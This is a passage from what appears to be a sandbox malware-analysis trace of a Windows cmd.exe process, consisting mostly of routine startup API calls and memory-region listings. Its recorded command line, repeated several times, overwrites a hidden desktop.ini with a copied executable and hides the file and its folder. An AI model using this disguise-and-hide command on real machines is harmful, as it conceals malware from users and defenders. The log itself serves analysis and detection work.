nNumberOfCharsToWrite=0x51, lpNumberOfCharsWritten=0x2af9cc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af9cc*=0x51) returned 1 [0177.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.690] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.690] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0177.690] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.690] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.690] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.691] SetConsoleInputExeNameW () returned 0x1 [0177.691] GetConsoleOutputCP () returned 0x1b5 [0177.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.691] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.691] exit (_Code=1) Process: id = "321" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xb9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24632 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24633 start_va = 0x30000 
end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24634 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24635 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 24636 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24637 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24638 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24639 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24640 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24641 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24662 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24663 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24664 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" 
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24665 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24666 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 24667 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24668 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24669 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24670 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24671 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24672 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24673 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: 
id = 24674 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24675 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24676 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 24677 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24678 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24679 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 24680 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 24681 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 24682 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 24683 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 24684 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 24685 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 24686 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 434 os_tid = 0xbb8 [0177.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8e4 | out: lpSystemTimeAsFileTime=0x14f8e4*(dwLowDateTime=0x9fbb83c0, dwHighDateTime=0x1d440a9)) [0177.859] GetCurrentProcessId () returned 0xb9c [0177.859] GetCurrentThreadId () returned 0xbb8 [0177.859] GetTickCount () returned 0x33810 [0177.859] QueryPerformanceCounter (in: lpPerformanceCount=0x14f8dc | out: lpPerformanceCount=0x14f8dc*=23464849876) returned 1 [0177.860] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0177.860] __set_app_type (_Type=0x1) [0177.860] __p__fmode () returned 0x76b331f4 [0177.860] __p__commode () returned 0x76b331fc [0177.860] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0177.860] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0177.860] GetCurrentThreadId () returned 0xbb8 [0177.860] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbb8) returned 0x38 [0177.860] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.860] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0177.860] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.861] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0177.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f874 | out: phkResult=0x14f874*=0x0) returned 
0x2 [0177.861] VirtualQuery (in: lpAddress=0x14f8ab, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.861] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f844, dwLength=0x1c | out: lpBuffer=0x14f844*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0177.861] GetConsoleOutputCP () returned 0x1b5 [0177.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.861] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0177.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0177.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.862] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.862] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.862] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.862] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0177.862] GetEnvironmentStringsW () returned 0x280538* [0177.862] FreeEnvironmentStringsW (penv=0x280538) returned 1 [0177.862] GetEnvironmentStringsW () returned 0x280538* [0177.862] FreeEnvironmentStringsW (penv=0x280538) returned 1 [0177.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7e4 | out: phkResult=0x14e7e4*=0x40) returned 0x0 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0xe8, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x0, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: 
lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegCloseKey (hKey=0x40) returned 0x0 [0177.863] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7e4 | out: phkResult=0x14e7e4*=0x40) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x40, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x1, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x0, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x9, lpcbData=0x14e7e8*=0x4) returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x4, lpData=0x14e7f0*=0x9, lpcbData=0x14e7e8*=0x4) 
returned 0x0 [0177.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7ec, lpData=0x14e7f0, lpcbData=0x14e7e8*=0x1000 | out: lpType=0x14e7ec*=0x0, lpData=0x14e7f0*=0x9, lpcbData=0x14e7e8*=0x1000) returned 0x2 [0177.863] RegCloseKey (hKey=0x40) returned 0x0 [0177.863] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638d [0177.863] srand (_Seed=0x5b88638d) [0177.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" [0177.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" [0177.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.864] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281c98, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0177.864] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.864] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.864] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.864] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0177.864] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0177.864] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0177.864] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0177.864] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0177.864] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0177.864] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0177.864] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0177.864] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0177.864] GetEnvironmentStringsW () returned 0x282688* [0177.864] FreeEnvironmentStringsW (penv=0x282688) returned 1 [0177.864] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0177.865] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0177.865] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0177.865] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0177.865] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0177.865] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0177.865] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0177.865] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0177.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f5b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.865] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f5b0, lpFilePart=0x14f5ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f5ac*="Desktop") returned 0x18 [0177.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.865] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f32c | out: lpFindFileData=0x14f32c) returned 0x280d18 [0177.865] FindClose (in: hFindFile=0x280d18 | out: hFindFile=0x280d18) returned 1 [0177.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f32c | out: lpFindFileData=0x14f32c) returned 0x280d18 [0177.865] FindClose (in: hFindFile=0x280d18 | out: hFindFile=0x280d18) returned 1 [0177.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f32c | out: lpFindFileData=0x14f32c) returned 0x280d18 [0177.865] FindClose (in: hFindFile=0x280d18 | out: hFindFile=0x280d18) returned 1 [0177.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.866] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0177.866] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0177.866] GetEnvironmentStringsW () returned 0x280538* [0177.866] FreeEnvironmentStringsW (penv=0x280538) returned 1 [0177.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.866] GetConsoleOutputCP () returned 0x1b5 [0177.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0177.866] GetUserDefaultLCID () returned 0x409 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="0") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="0") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f6f0, cchData=128 | out: lpLCData="1") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0177.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0177.867] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0177.868] GetConsoleTitleW (in: lpConsoleTitle=0x270b30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0177.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0177.868] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0177.868] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0177.869] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0177.869] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0177.869] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0177.869] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0177.869] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0177.869] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0177.869] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0177.871] _wcsicmp (_String1="del", _String2=")") returned 59 [0177.871] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0177.871] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0177.871] _wcsicmp (_String1="IF", _String2="del") returned 5 [0177.871] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0177.871] _wcsicmp (_String1="REM", _String2="del") returned 14 [0177.871] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0177.873] _wcsicmp (_String1="type", _String2=")") returned 75 [0177.873] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0177.873] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0177.873] _wcsicmp (_String1="IF", _String2="type") returned -11 [0177.873] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0177.873] _wcsicmp (_String1="REM", _String2="type") returned -2 [0177.873] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0177.877] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 